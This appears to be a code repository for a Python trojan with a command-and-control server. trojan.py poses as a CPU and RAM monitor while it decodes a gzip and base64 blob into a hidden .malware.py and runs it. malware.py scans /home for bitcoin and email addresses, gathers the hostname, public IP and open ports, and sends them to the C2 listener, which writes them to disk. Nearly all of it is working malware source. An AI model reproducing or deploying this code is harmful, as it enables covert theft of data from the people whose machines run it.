├── README.md ├── c2-server └── c2-server.py ├── test-data ├── my_bitcoin_addresses.txt └── my_emails.txt └── trojan ├── malware.py ├── malware.py.gz └── trojan.py /README.md: -------------------------------------------------------------------------------- 1 | ## A simple implementation of a trojan malware in python with a C2 ( command and control ) server 2 | -------------------------------------------------------------------------------- /c2-server/c2-server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import socket 3 | import base64 4 | import random 5 | from string import ascii_lowercase 6 | 7 | # create TCP socket 8 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 9 | 10 | # listen on localhost port 1337 11 | s.bind(("127.0.0.1", 1337)) 12 | 13 | # queue up to 5 requests 14 | s.listen(5) 15 | 16 | print("listening on port 1337...") 17 | 18 | while True: 19 | # establish a connection 20 | clientsocket, client_ip = s.accept() 21 | print("[+] received a connection from -> {}".format(client_ip)) 22 | 23 | # get the encoded data 24 | encoded_data = clientsocket.recv(4096) 25 | clientsocket.close() 26 | 27 | # open a file with a random name and insert the decoded data into it 28 | random_fd = open("".join(random.choices(ascii_lowercase, k = 10)), "w") 29 | random_fd.write(base64.b64decode(encoded_data).decode("UTF-8")) 30 | random_fd.close() -------------------------------------------------------------------------------- /test-data/my_bitcoin_addresses.txt: -------------------------------------------------------------------------------- 1 | bc1qv7k79qxgwv6wq02zycd5cju4ymgzxw9c3nevft 2 | bc1qpvyh373y2pds590r9wfw26tavayxkuecmqkuh9 3 | bc1qucum2802f06fzgld80hrtj42lck9ekvlz7ataa 4 | 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2 5 | 3FZbgi29cpjq2GjdwV8eyHuJJnkLtktZc5 6 | -------------------------------------------------------------------------------- /test-data/my_emails.txt: -------------------------------------------------------------------------------- 1 | mybusinessemail@company.com 2 | notimportant@important.com 3 | personalemail@home.com 4 | -------------------------------------------------------------------------------- /trojan/malware.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import requests 3 | import socket 4 | import base64 5 | import json 6 | import re 7 | import os 8 | 9 | 10 | def main(): 11 | # get hostname of the machine 12 | hostname = socket.gethostname() 13 | 14 | # get the public ipv4 address of the machine 15 | headers = { 16 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" 17 | } 18 | public_ip = requests.get("https://ipapi.co/ip", headers = headers).text 19 | 20 | # search for bitcoin and email addresses 21 | bitcoin_addresses_list = [] 22 | email_addresses_list = [] 23 | for root, subdirs, files in os.walk("/home"): 24 | for file in files: 25 | file_fd = open("{}/{}".format(root, file), "r") 26 | try: 27 | # read the contents of each file 28 | file_contents = file_fd.read().strip() 29 | 30 | # search for bitcoin addresses 31 | bitcoin_addresses = re.findall(r"([13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})", file_contents) 32 | 33 | # search for email addresses 34 | email_addresses = re.findall(r"[a-z0-9._]+@[a-z0-9]+\.[a-z]{1,7}", file_contents) 35 | 36 | # check if we have found any bitcoin addresses or emails 37 | if len(bitcoin_addresses) > 0: 38 | bitcoin_addresses_list = bitcoin_addresses_list + bitcoin_addresses 39 | if len(email_addresses) > 0: 40 | email_addresses_list = email_addresses_list + email_addresses 41 | 42 | file_fd.close() 43 | except: 44 | pass 45 | 46 | 47 | # get all open ports on the machine 48 | open_ports = os.popen("netstat -plant | grep -i listen | awk '{print $4}' | grep -P '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}'").read() 49 | open_ports = open_ports.strip().split("\n") 50 | 51 | # encode data to json and send them to command and control server 52 | data = { 53 | "machine_hostname": hostname, 54 | "machine_ip": public_ip, 55 | "machine_open_ports": open_ports, 56 | "bitcoin_addresses_found": bitcoin_addresses_list, 57 | "email_addresses_found": email_addresses_list 58 | } 59 | 60 | # base64 encode the json data 61 | encoded_data = base64.b64encode(json.dumps(data).encode()) 62 | 63 | # send data to command and control server 64 | 65 | # create a socket object 66 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 67 | 68 | # connect to command and control server on port 1337 69 | s.connect(("127.0.0.1", 1337)) 70 | s.send(encoded_data) 71 | s.close() 72 | 73 | 74 | if __name__ == "__main__": 75 | main() -------------------------------------------------------------------------------- /trojan/malware.py.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/leetCipher/python-trojan/2224473682eee4f4dfcd255aa24271ba18e14f5f/trojan/malware.py.gz -------------------------------------------------------------------------------- /trojan/trojan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import psutil 3 | import base64 4 | import time 5 | import gzip 6 | import os 7 | 8 | def main(): 9 | # fork a child process 10 | pid = os.fork() 11 | 12 | if pid > 0: 13 | # parent process 14 | while True: 15 | # percentage of used CPU 16 | cpu = psutil.cpu_percent() 17 | # percentage of used RAM 18 | ram = psutil.virtual_memory().percent 19 | # percentage of used disk space 20 | disk = psutil.disk_usage("/").percent 21 | # number of all running processes 22 | processes_count = 0 23 | for _ in psutil.process_iter(): 24 | processes_count += 1 25 | 26 | # print to screen 27 | print("---------------------------------------------------------") 28 | print("| CPU USAGE | RAM USAGE | DISK USAGE | RUNNING PROCESSES |") 29 | print("| {:02}% | {:02}% | {:02}% | {} |".format(int(cpu), int(ram), int(disk), processes_count)) 30 | print("---------------------------------------------------------") 31 | 32 | # sleep for 2s 33 | time.sleep(2) 34 | else: 35 | # child process 36 | trojan() 37 | 38 | 39 | def trojan(): 40 | malware_fd = open(".malware.py", "w") 41 | blob = "H4sICAncMmEAA21hbHdhcmUucHkAjVZtb9s2EP7uX3FTB0RCZMmKHadx4WHB0K7d1q5YO2BYEgi0RMesZVIj6cSJ4/++IyX6TXY22bBJ3nMvfHh31Kvv4rmS8YjxuHzUE8G7LTYrhdQg6T9zqrRycyWyKdVuNiKK9ntu9k0JvtFzI6FarVZOxzAjjPvBoAX4vII7qmEilOZkRkGMQU8oIrIJ49Qi1rJh7TNCDbfoB60tM0a1nI8KlgEr73tA8lxSpQ5apSSnUqHRpZ2bx/tTUdm+uqNcewPwPoonVhQkPo864P+VJG/gN8bnC1i87qf93huQ94OL11EngJ9pNhXxWSfp4DeBd0zSsVjERuhZ4yv7W0WWshKdOjbNXnxvonWpBnHMSlKyKBM48MKtEOtREGm60G7DihKZTWAsJIyYzgTjQHgOFNkt3M6psuBanq5X04IpjYavb63c6hyVGg9SCB2Cmo9yJlUIY1ZQBehRqOiBFFPfiydiRr36UJ2WgRmUhW9EVoxL6ThHL6Kk3PeWq3i58iLUmhHtV+4MJgjBk16wo6vl466xihCJLNlzzgTXeIb23CkxHKGhhoKNYA0duogiY8YPIqUlK1167To6xPwO39tPg3t7+tGY8ZwUhS89/zrp3i6T1TVpT2ftp6v2+1/anz63/07al7fLs37Y7a6eR1mC4qeOWepehueXq8ALd3fwX5EeyovtZy8H9qOs3Ufp7emPLpTTm8gMMfjwYvW/4skmWCrAxvBAYULuKUY2x5wl/LHJJLigm7GigQKTpkFtAD9Ap5kaB4/BJfkRwWlTcCyMPeZeCOJInR1cPt1fbvLpMjYrhDKdcMfVIqOlboZREmXacHUcpmfi8doSBNOjkXTeaJVGmlbSoSn4sqpYTrXSREO7LAjX8Ax3kpbQZmDCR3vPQB6mcLIsJUPx973VyRrzGU5ucsya7uomOjoY2P/z1YkX1DV5IJr1xNVrpMqCYUu94XXTqLdKeSZyCjnRBLSwN5Rtl4py2zRmZjUTsxmx+ZjbJiJFgQB5T6W1YpV3LoyaptRdR3htuGHYRGFXH2xugQOAzXYQuJlsIZvZaisI4YfzeEt1P8uc4qHsq2+tmrvqcncUmvSw9Bk6quvDCvK05qeCR6N+rxL4Bh3l81mpfAMJono9CDZ3GTLuzuaFU6jhGeaDpkDqFwIQo280q4JWm9eE6s+vZ1fv0g+f3n4NnfTL7z/9mn75+sfbq4/rMNAbR0MvB2FKxL7PJN3uReUzqhV930vOLqIOfhLshwYQBDXEbNHfZsoJXPW2WthP0tTkTprCcAhempo3pTT1qjKuXpv+BfXo/OqiCQAA" 42 | malware = gzip.decompress(base64.b64decode(blob)).decode("UTF-8") 43 | malware_fd.write(malware) 44 | malware_fd.close() 45 | 46 | # execute malware 47 | os.system("/usr/bin/python3 .malware.py") 48 | 49 | 50 | if __name__ == "__main__": 51 | main() --------------------------------------------------------------------------------